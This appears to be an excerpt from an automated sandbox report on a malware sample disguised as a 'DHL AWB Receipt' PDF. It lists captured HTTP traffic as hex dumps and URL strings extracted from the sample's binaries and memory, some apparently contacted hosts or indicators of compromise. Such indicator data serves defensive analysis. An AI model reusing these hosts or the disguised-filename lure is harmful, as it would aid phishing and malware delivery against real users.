Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 14:16:42 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 14:16:44 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 14:16:47 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 14:16:50 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36

Source: DHL AWB Receipt_pdf.bat.exe, nlvpnyUnaRqfA.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: DHL AWB Receipt_pdf.bat.exe, nlvpnyUnaRqfA.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: DHL AWB Receipt_pdf.bat.exe, nlvpnyUnaRqfA.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000004FB6000.00000004.10000000.00040000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000003916000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://primepath.net/esw3/?XHUtU=STIHOi9CYFClakjV40da904kxu04fSTg15TVg9rRTe6RIWG0ngBkAmIpkbb4lCp8vZ5
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2171588795.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, nlvpnyUnaRqfA.exe, 0000000A.00000002.2291282673.0000000003351000.00000004.00000800.00020000.00000000.sdmp, nlvpnyUnaRqfA.exe, 0000000A.00000002.2291282673.0000000003809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: nlvpnyUnaRqfA.exe, 0000000A.00000002.2291282673.0000000003809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/CRUDDataSet.xsd
Source: nlvpnyUnaRqfA.exe, 0000000A.00000002.2291282673.0000000003809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/CRUDDataSet1.xsd
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2171588795.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, nlvpnyUnaRqfA.exe, 0000000A.00000002.2291282673.0000000003351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/CRUDDataSet1.xsd?0ZM
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2171588795.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, nlvpnyUnaRqfA.exe, 0000000A.00000002.2291282673.0000000003809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/CRUDDataSet1.xsdIData
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.1community.net
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.2023kuanmeiyingzhibo.net/binding
Source: V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/qnz1/
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb03
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1d8.
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/adblock.fe363a40.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js
Source: V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/appsdetail.fe363a40.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/bl.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/broadcast.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/common.fe363a40.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/header.fe363a40.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/index.umd.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/js.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/nc.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/pcmodule.fe363a40.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/pullup.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/realNameAuth.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js
Source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4578083882.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/picture/anva-zilv.png
Source: V7C903J7TTVs.exe, 00000012.00000002.4575364481.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg
